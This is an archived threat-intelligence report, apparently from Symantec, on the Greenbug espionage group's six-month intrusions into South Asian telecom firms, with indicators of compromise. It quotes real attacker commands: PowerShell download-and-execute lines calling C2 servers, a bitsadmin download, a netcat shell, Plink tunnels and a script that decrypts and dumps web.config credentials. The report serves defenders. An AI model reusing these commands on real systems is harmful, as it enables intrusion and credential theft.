{ "id": "5e94c733-c649-4331-82fb-8cbd6dcfb400", "created_at": "2026-04-06T00:06:44.928265Z", "updated_at": "2026-04-10T03:33:11.056271Z", "deleted_at": null, "sha1_hash": "b6f0182c5acffaf27571fcb6f3a7c9a77ac08f94", "title": "Sophisticated Espionage Group Turns Attention to Telecom Providers in South Asia", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 82473, "plain_text": "Sophisticated Espionage Group Turns Attention to Telecom Providers in\r\nSouth Asia\r\nBy About the Author\r\nArchived: 2026-04-05 18:25:19 UTC\r\nThe Greenbug espionage group is actively targeting telecommunications companies in South Asia, with activity seen as\r\nrecently as April 2020.\r\nThere are indications that at least one of the companies was first targeted as early as April 2019.\r\nEmail appears to be the initial infection vector used by the group. Greenbug is using a mixture of off-the-shelf tools and\r\nliving-off-the-land techniques in these attacks. It appears the group is interested in gaining access to database servers; we see\r\nit stealing credentials then testing connectivity to these servers using the stolen credentials. \r\nGreenbug is believed to likely be based out of Iran, and there has been speculation in the past that it has connections to the\r\ndestructive Shamoon group, which has carried out disk-wiping attacks against organizations in Saudi Arabia. The Shamoon\r\nattacks have been extensively covered, but it was never clear how the attackers stole the credentials that allowed them to\r\nintroduce their destructive malware onto victim systems. Research by Symantec, a division of Broadcom (NASDAQ:\r\nAVGO), in 2017 found evidence that Greenbug was on an organization’s network prior to a wiping attack that involved\r\nW32.Disttrack.B (Shamoon’s malware). This link was never definitively established, but cooperation between the two\r\ngroups is considered a possibility.\r\nMuch of the activity we saw in this attack campaign is in line with activity we have seen from Greenbug in the past,\r\nincluding the use of email as an initial infection vector, the use of publicly available hack tools like Mimikatz and Plink, and\r\nthe apparent focus on collecting credentials and maintaining a persistent, low-profile presence on victim networks. \r\nInfection vector\r\nAcross multiple victim machines, a file named proposal_pakistan110.chm:error.html was executed via an internet browser.\r\nWe also see the same file being opened by archiver tools. While we were unable to retrieve the file for analysis, the same\r\ntechnique has been leveraged by Greenbug in the past, as early as 2016. In these earlier attacks, emails were sent to targets\r\ncontaining a link to a likely compromised site, which hosted an archive file. This archive contains a malicious CHM file\r\n(compiled HTML Help file), which includes an ADS (alternative data steam) to hide its payload, which is installed when\r\nexecuted. This file usually also contains a decoy PDF file containing an error message that says the file could not be opened\r\ncorrectly.\r\nWe have also seen similarly named files used in other organizations in the past to drop Trojan.Ismdoor, Greenbug’s custom\r\nmalware.\r\nAround the same time as we saw this file, a file called GRUNTStager.hta was also executed. Symantec believes the attackers\r\nused the publically available Covenant post-exploitation framework in order to gain an initial foothold in their target\r\norganizations.\r\nCovenant is a publicly available hack tool that is described as “a .NET command and control framework that aims to\r\nhighlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command\r\nand control platform.” It is described as being for use by “red teams,” but is also open to being abused by malicious actors.\r\nCase study: Six-month intrusion\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia\r\nPage 1 of 7\n\nGreenbug was present on the systems of one organization from October 2019 to April 2020. It appeared to be interested in\r\ngaining access to the organization’s database server. The attackers were observed executing various PowerShell commands\r\non the victim system.\r\nThe first activity was seen on October 11, 2019, when a malicious PowerShell command was executed to install a\r\nCobaltStrike Beacon module to download the next stage payload.\r\nWe were able to extract two command and control (C\u0026C) server addresses from the PowerShell command.\r\nInitially, the attackers leveraged this access to execute PowerShell to determine the version of PowerShell installed via\r\n$PSVersionTable. After this, we observed the attackers proceed to attempt to download a malicious file hosted on the same\r\npreviously mentioned C\u0026C server.\r\nPowerShell.exe -nop -w hidden -c $L=new-object net.webclient;$L.proxy=\r\n[Net.WebRequest]::GetSystemWebProxy();$L.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX\r\n$L.downloadstring('http://95[.]179.177.157:445/0Zu5WpWN');\r\nThis command was executed several times but it is unclear if the attackers were successful. Approximately an hour later, the\r\nattackers were also observed attempting to perform a download to CSIDL_APPDATA\\a8f4.exe via the bitsadmin utility\r\nbitsadmin /transfer a8f4 http://95.179.177.157:8081/asdfd CSIDL_APPDATA\\a8f4.exe\r\nThe BITS administration utility can be used to download or upload jobs to be executed. It is a legitimate tool that we\r\ncommonly see abused by malicious actors. The attackers used this tool to download additional malicious tools to the\r\ncompromised machine.\r\nA short time later, the attackers executed several tools from CSIDL_SYSTEM86\\[REDACTED] directory:\r\nHash Directory Tool\r\n2a3f36c849d9fbfe510c00ac4aca1750452cd8f6d8b1bc234d22bc0c40ea1613\r\ncsidl_system_drive\\\r\n[REDACTED]\r\nrevshell.exe\r\n9809aeb6fd388db9ba60843d5a8489fea268ba30e3935cb142ed914d49c79ac5\r\ncsidl_system_drive\\\r\n[REDACTED]\r\nprinters.exe\r\n3c6bc3294a0b4b6e95f747ec847660ce22c5c4eee2681d02cc63f2a88d2d0b86\r\ncsidl_system_drive\\\r\n[REDACTED]\r\nmsf.exe\r\nThe attackers were then seen launching PowerShell and attempting to execute a PowerShell script called msf.ps1. \r\nPowerShell.exe -ExecutionPolicy Bypass -File CSIDL_SYSTEM_DRIVE\\[REDACTED]\\msf.ps1\r\nThis command was executed several times and is likely used to install a Metasploit payload to retain access to the\r\ncompromised machine. That is the last activity seen on that day.\r\nNo further activity was observed until February 6, 2020, when a suspicious PowerShell command was executed. The\r\nPowerShell command follows the execution of the w3wp.exe process – an application that is used to serve requests to a web\r\napplication. This may indicate that the attackers have used a webshell on the compromised machine.\r\nThe following is a copy of the PowerShell command executed by the attackers:\r\n$ErrorActionPreference = 'SilentlyContinue';$path=\"C:\\[REDACTED]\\\";Foreach ($file in (get-childitem $path -\r\nFilter web.config -Recurse)) {; Try { $xml = [xml](get-content $file.FullName) } Catch { continue };Try {\r\n$connstrings = $xml.get_DocumentElement() } Catch { continue };if\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia\r\nPage 2 of 7\n\n($connstrings.ConnectionStrings.encrypteddata.cipherdata.ciphervalue -ne $null){;$tempdir = (Get-Date).Ticks;new-item $env:temp\\$tempdir -ItemType directory | out-null; copy-item $file.FullName\r\n$env:temp\\$tempdir;$aspnet_regiis = (get-childitem $env:windir\\microsoft.net\\ -Filter aspnet_regiis.exe -recurse |\r\nselect-object -last 1).FullName + ' -pdf \"\"connectionStrings\"\" ' + $env:temp + '\\' + $tempdir;Invoke-Expression\r\n$aspnet_regiis; Try { $xml = [xml](get-content $env:temp\\$tempdir\\$file) } Catch { continue };Try { $connstrings =\r\n$xml.get_DocumentElement() } Catch { continue };remove-item $env:temp\\$tempdir -recurse};Foreach ($_ in\r\n$connstrings.ConnectionStrings.add) { if ($_.connectionString -ne $NULL) { write-host \"\"$file.Fullname ---\r\n$_.connectionString\"\"} } };\r\nThis command is used to search for files similar to web.config. For each file found, it extracts username and password\r\ninformation where possible, decrypting it using the aspnet_regiis.exe utility. These credentials may be used to access\r\norganizational resources such as SQL servers.\r\nFurther activity was seen on February 12 and February 14. On February 12, the attackers returned and executed a tool:\r\npls.exe. An hour later, the attackers bound cmd.exe to a listening port using netcat with the following command:\r\nCSIDL_SYSTEM_DRIVE\\[REDACTED]\\infopagesbackup\\ncat.exe [REDACTED] 8989 -e cmd.exe\r\nThe same command was issued again about 20 minutes later.\r\nTwo days later, at 7.29am local-time, the attackers returned and connected to the listening port, launching cmd.exe.\r\nThey issued the following commands:\r\nCommand Description\r\nCSIDL_SYSTEM\\cmd.exe\" /c net user\" List all available local user accounts and information\r\nPowerShell -c Get-PSDrive -PSProvider \\\"\r\nFileSystem\\\"\"\"\"\"\"\"\r\nList all available drives on the filesystem and related information\r\n(e.g. available space, location etc.)\r\nThe next day (February 15) the attackers returned to the command prompt and issued a command to add a user and then\r\nchecked that the user was added. No further activity was observed until March 4, when a PowerShell command was\r\nlaunched at 6.30pm local time. A WMI command was also observed being executed and used to search for a specific\r\naccount. Shortly after this, the well-known credential-stealing tool Mimikatz was executed from\r\n%USERPROFILE%\\documents\\x64. \r\nOn March 11, the attackers attempted to connect to a database server via PowerShell, presumably using credentials they had\r\nstolen. The attackers also used an SQL command to retrieve the version information of the database server, presumably to\r\ntest the credentials and connectivity.\r\nPowerShell -C\r\n$conn=new-object System.Data.SqlClient.SQLConnection(\" \"\"Data\r\nSource=[REDACTED];User [REDACTED] { $conn.Open(); }Catch { continue;\r\n}$cmd = new-object System.Data.SqlClient.SqlCommand(\" \"\"select\r\n@@version;\" \"\", $conn);$ds=New-Object\r\nsystem.Data.DataSet;$da=New-Object\r\nsystem.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill($ds);$ds.Tables[0];$conn.Close();\"\"\r\nFurther activity was seen in April. On April 8, suspicious PowerShell commands were observed attempting to download\r\ntools from a remote host. \r\nPowerShell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=\r\n[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia\r\nPage 3 of 7\n\n$k.downloadstring('http://185.205.210.46:1003/iO0RBYy3O');\r\nPowerShell.exe -nop -w hidden -c $m=new-object net.webclient;$m.proxy=\r\n[Net.WebRequest]::GetSystemWebProxy();$m.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX\r\n$m.downloadstring('http://185.205.210.46:1131/t8daWgy9j13');\r\nThat was the only activity seen on April 8, then on April 13 PowerShell was launched and the following commands were\r\nobserved being executed:\r\nCommand Description\r\nPowerShell.exe\" -noninteractive -executionpolicy bypass\r\nwhoami\"\r\nCheck the account name of the current user executing the\r\ncommand\r\nPowerShell.exe\" -noninteractive -executionpolicy bypass\r\nnetstat -a\"\r\nNetwork routing information\r\nNext, PowerShell was used to connect to a database server and check the version information, likely to confirm working\r\ncredentials. This is similar to the previous PowerShell command observed with the exception of a different database server\r\nIP address.\r\nFinally, the attackers used PowerShell to view the current ARP table (IPs and hostname of machines that have recently been\r\ncommunicated with) via an arp -a command. That is the last activity we observed on this machine.\r\nA number of suspicious files were found on this machine (see IoCs). The files include the Covenant tool and Mimikatz, as\r\nalready mentioned, as well as Cobalt Strike, an off-the-shelf tool that can be used to load shellcode onto victim machines,\r\nand multiple webshells.\r\nOther machines on the same network\r\nWe saw suspicious activity on various machines on this same victim’s network. The attackers targeted several other users\r\nwithin the organization with the same file, proposal_pakistan110.chm:error.html, which was opened by an archiver tool and,\r\nin one instance, via the Microsoft Edge browser. Following this, we observed a backdoor being executed on the machine,\r\nalongside additional tools downloaded to the %APPDATA% directory from the attacker’s infrastructure.\r\nHash Directory Tool\r\n450ebd66ba67bb46bf18d122823ff07ef4a7b11afe63b6f269aec9236a1790cd CSIDL_COMMON_APPDATA\\oracle local.ex\r\nee32bde60d1175709fde6869daf9c63cd3227155e37f06d45a27a2f45818a3dc CSIDL_COMMON_APPDATA\\adobe adobe.e\r\n071e20a982ea6b8f9d482685010be7aaf036401ea45e2977aca867cedcdb0217 c:\\programdata\\oracle java.ee\r\nTunnels back to attackers\r\nOn one machine in this organization, we saw some suspicious PowerShell commands executed on December 9. One of the\r\nfiles executed by PowerShell, comms.exe, is Plink. A second similar command used the Bitvise command line tunneling\r\nclient. Both tools are used to set up a tunnel to attacker-controlled infrastructure to allow Terminal Services and RDP access\r\nto an internal machine.\r\n\"CSIDL_COMMON_APPDATA\\comms\\comms.exe\" apps.vvvnews.com -P \u003c?,?\u003e -l \u003c?,?\u003e -pw \u003c?,?\u003e -proxytype\r\nhttp_basic –proxyip [REDACTED] -proxyport 8080 -proxyuser [REDACTED].haq -proxypass [REDACTED] -C -\r\nR [REDACTED]:4015:[REDACTED]:1540\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia\r\nPage 4 of 7\n\n\"CSIDL_COMMON_APPDATA\\comms\\comms.exe\" [REDACTED] -pw=[REDACTED] -s2c=[REDACTED] 1819\r\n[REDACTED] 3389 -proxy=y -proxyType=HTTP -proxyServer=[REDACTED] -proxyPort=8080 -proxyUsername=\r\n[REDACTED]\\[REDACTED].haq -proxyPassword=\u003c?,?\u003e\r\nTools such as Plink and Bitvise are legitimate sysadmin tools, but have been seen being exploited by malicious actors\r\nbefore, including by Iranian actors earlier this year.\r\nPlink was also seen on a second machine in this organization, which appears to have been compromised from November\r\n2019 up to April 2020. The first suspicious activity on this machine was seen on November 13, when PowerShell Remoting\r\nwas enabled on the machine to allow it to receive PowerShell commands.\r\nA PowerShell command was used to download a file from attacker controlled infrastructure and launch it with a specific\r\nargument.\r\n(New-Object System.Net.WebClient).DownloadFile('http://apps[.]vvvnews.com:8080/Yft.dat',\r\n'C:\\Programdata\\VMware\\Vmware.exe');\r\nstart-process C:\\Programdata\\VMware\\Vmware.exe -arg 'L3NlcnZlcj12c2llZ3J1LmNvbSAvaWQ9NDE=';\r\nThe argument decodes to /server=vsiegru.com /id=41. Shortly after this the Plink utility was executed to establish a\r\nconnection to the victim network. A second PowerShell command was then executed as follows: \r\nDel -force C:\\Programdata\\Vmware\\Vmware.exe;\r\n(New-Object System.Net.WebClient).DownloadFile('http://apps[.]vvvnews.com:8080/Yf.dat',\r\n'C:\\Programdata\\Nt.dat');\r\nmove C:\\Programdata\\Nt.dat C:\\Programdata\\Vmware\\VMware.exe -force;\r\ncmd.exe /c sc create \"VMwareUpdate\" binpath= \"C:\\Programdata\\Vmware\\VMware.exe\r\nL3NlcnZlcj1rb3BpbGthb3J1a292LmNvbSAvaWQ9NDkgL3Byb3h5PXllcyAvcHJveHl1cmw…[REDACTED]…\r\nBUTUxcamF2ZWQubmFiaSAvcGFzc3dvcmQ9cHRtbEAyMjMz\" displayname= \"VMware Update Service\" start=\r\nauto;\r\nstart-service VMwareUpdate;\r\nExit;\r\nThe encoded argument decodes to the following:\r\n/server=kopilkaorukov.com /id=49 /proxy=yes /proxyurl=http://[REDACTED]:8080 /credential=yes /username=\r\n[REDACTED]\\[REDACTED] /password=[REDACTED]\r\nThe attackers were then seen adding a user to the administrators group on this machine. Two further PowerShell commands\r\nwere executed on the machine about a week later, on November 16.\r\nThe first decodes to the following:\r\niex ((New-Object Net.WebClient).DownloadString('http://apps[.]vvvnews.com:8080/Default.htt'))\r\nAs the attackers have set up a tunnel, using the Plink tool, all connections appear to be routing to internal machine IP\r\naddresses. This was likely done as a means to evade detection.\r\nActivity targeting telecoms\r\nGreenbug’s activity in this campaign seems to make it clear that its main focus with these victims is to steal credentials, and\r\nto maintain a low profile on the victim’s network so the attackers can remain on it for a substantial period of time. This is\r\ntypical of the activity we have seen in Greenbug victims in the past, with maintaining persistence on a victim network\r\nappearing to be one of the group’s primary goals. Greenbug has also been observed targeting telecoms companies in this\r\nsame region in previous attack campaigns.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia\r\nPage 5 of 7\n\nThe setting up of tunnels shows how important keeping a low-profile is for this group. Its focus on stealing credentials, and\r\non establishing connections with database servers, shows that it is aiming to achieve a high level of access to a victim’s\r\nnetwork - access that if exploited could cause havoc on a compromised network very quickly. This level of access, if\r\nleveraged by actors using disruptive malware or ransomware, could shut down an organization’s entire network very\r\nquickly. \r\nPrevious victims of Greenbug have included organizations in the aviation, government, investment, and education sectors, as\r\nwell as the telecoms sector, with attacks against telecoms organizations in the Middle East in 2017. In 2019, we observed 18\r\nnation-state backed groups targeting the telecoms sector worldwide, so it seems to be an area of interest for sophisticated\r\nactors recently.\r\nIt is probably not too hard to understand why the telecommunications industry, made up of phone providers and internet\r\nservice providers (ISPs), is attractive to APT groups, whose main motivation is most often intelligence gathering. The access\r\nto calls, communications logs, and messages offered by telecoms companies makes them hugely valuable targets for these\r\nattackers.\r\nWe can only speculate about Greenbug’s motives for targeting these specific telecoms companies, but it is clear that\r\ncomprehensive and persistent access to victim networks remains the key priority for this group. \r\nProtection\r\nSymantec products protect against threats discussed in this blog with the following detections:\r\nTrojan.Ismdoor\r\nTrojan.Ismdoor!gen1\r\nSystem Infected: Trojan.Ismdoor Activity\r\nIndicators of Compromise (IoCs)\r\nType Value Description\r\nDomain apps.vvvnews.com C2\r\nDomain vsiegru.com C2\r\nDomain kopilkaorukov.com C2\r\nFilename GruntStager.hta Covenant stager\r\nHash 2a3f36c849d9fbfe510c00ac4aca1750452cd8f6d8b1bc234d22bc0c40ea1613 Reverse Shell\r\nHash 9809aeb6fd388db9ba60843d5a8489fea268ba30e3935cb142ed914d49c79ac5 Infostealer\r\nHash 3c6bc3294a0b4b6e95f747ec847660ce22c5c4eee2681d02cc63f2a88d2d0b86 Backdoor\r\nHash ece23612029589623e0ae27da942440a9b0a9cd4f9681ec866613e64a247969d Mimikatz\r\nHash b8797931ad99b983239980359ef0ae132615ebedbf6fcb0c0e9979404b4a02a8 Webshell\r\nHash 9de28b94aa3f1a849221cf74224554b41a77473c694cadf3f2526ab06480eb85 Webshell\r\nHash b51eca570abad9341a08ae4d153d2c64827db876ee0491eb941d7e9a48d43554 Webshell\r\nHash 16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218 Webshell\r\nHash abb3ddc945d147a4ed435b71490764bc4a2860f4ad264052f407357911bd6746 Webshell\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia\r\nPage 6 of 7\n\nType Value Description\r\nHash 6cb51c7011f27418c772124d4433350a534061f5732c1331f5483d62b42402f7 Webshell\r\nHash 9bf8121e0f3461412dde107c4d1ceb2ed18ec0741f458956830e038fd1be6d44 Webshell\r\nHash 75cee6136011516dfe7bd9e45b25c2cf5d9af149a81fff0b8b3ab157a8cbf321 Covenant stager\r\nHash e974237c32f5d28019c5328bd022469236da87eecee19487902133aea89432a0 Covenant stager\r\nHash f577fc8f22b6eec782dbcbe54f5a8f3b00e8e6d8dc7aa94b2fffcc2b7ce09c6a Covenant stager\r\nHash 53bbc9ebe40725bd74ebf29616f48a8aed0a544dd0e4f40801ac1b522f2cf32f CHM file\r\nHash fd95ffb7c70f828ef021e7dbdaf852f54f385095e7f58607f093096b68f40a32 Backdoor\r\nHash 071e20a982ea6b8f9d482685010be7aaf036401ea45e2977aca867cedcdb0217 Unknown\r\nHash ee32bde60d1175709fde6869daf9c63cd3227155e37f06d45a27a2f45818a3dc Backdoor\r\nHash 4c7813a1f3eb5d5d8b8a1e53af074c96cfc6ddb14b21188fd84970f001bfc0ff Unknown\r\nHash 471dadfe16cf2cf82566d404d2b7d1baf66b72c385ae272dcc743a285113e280 CHM file\r\nHash 069a29a0642ea5e2034250f5465cb2230edf1b49ad42d16ff4cddfee1f693314 Unknown\r\nHash faba07425c1fa65a9a68a17b99e83663a2a32fbb2a7c3df347b7a7411a7058bc Unknown\r\nHash 0644b3ffc856eb54b53338ab8ecd22dd005ee5aacfe321f4e61b763a93f82aea Unknown\r\nHash fc002268620fa67ffe260ea9f3a6bbad8637f9bef8ae85b8d6061cec0390b9e2 Unknown\r\nHash 450ebd66ba67bb46bf18d122823ff07ef4a7b11afe63b6f269aec9236a1790cd Unknown\r\nIP Address 95.179.177.157 Covenant C2\r\nIP Address 185.205.210.46 Powershell C2\r\nIP Address 185.243.115.69 Proxy tunnel\r\nIP Address 185.243.114.247 Proxy tunnel\r\nYou might also enjoy\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia" ], "report_names": [ "greenbug-espionage-telco-south-asia" ], "threat_actors": [ { "id": "e58deb93-aff1-4be5-8deb-37fe8af0b7ed", "created_at": "2022-10-25T16:07:23.918534Z", "updated_at": "2026-04-10T02:00:04.789509Z", "deleted_at": null, "main_name": "Greenbug", "aliases": [ "Greenbug", "Volatile Kitten" ], "source_name": "ETDA:Greenbug", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "25896473-161f-411f-b76a-f11bb26c96bd", "created_at": "2023-01-06T13:46:38.75749Z", "updated_at": "2026-04-10T02:00:03.090307Z", "deleted_at": null, "main_name": "CHRYSENE", "aliases": [ "Greenbug" ], "source_name": "MISPGALAXY:CHRYSENE", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6bba8e81-73af-4010-86dc-d43c408ca342", "created_at": "2023-01-06T13:46:38.553459Z", "updated_at": "2026-04-10T02:00:03.021597Z", "deleted_at": null, "main_name": "Greenbug", "aliases": [], "source_name": "MISPGALAXY:Greenbug", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434004, "ts_updated_at": 1775791991, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b6f0182c5acffaf27571fcb6f3a7c9a77ac08f94.pdf", "text": "https://archive.orkl.eu/b6f0182c5acffaf27571fcb6f3a7c9a77ac08f94.txt", "img": "https://archive.orkl.eu/b6f0182c5acffaf27571fcb6f3a7c9a77ac08f94.jpg" } }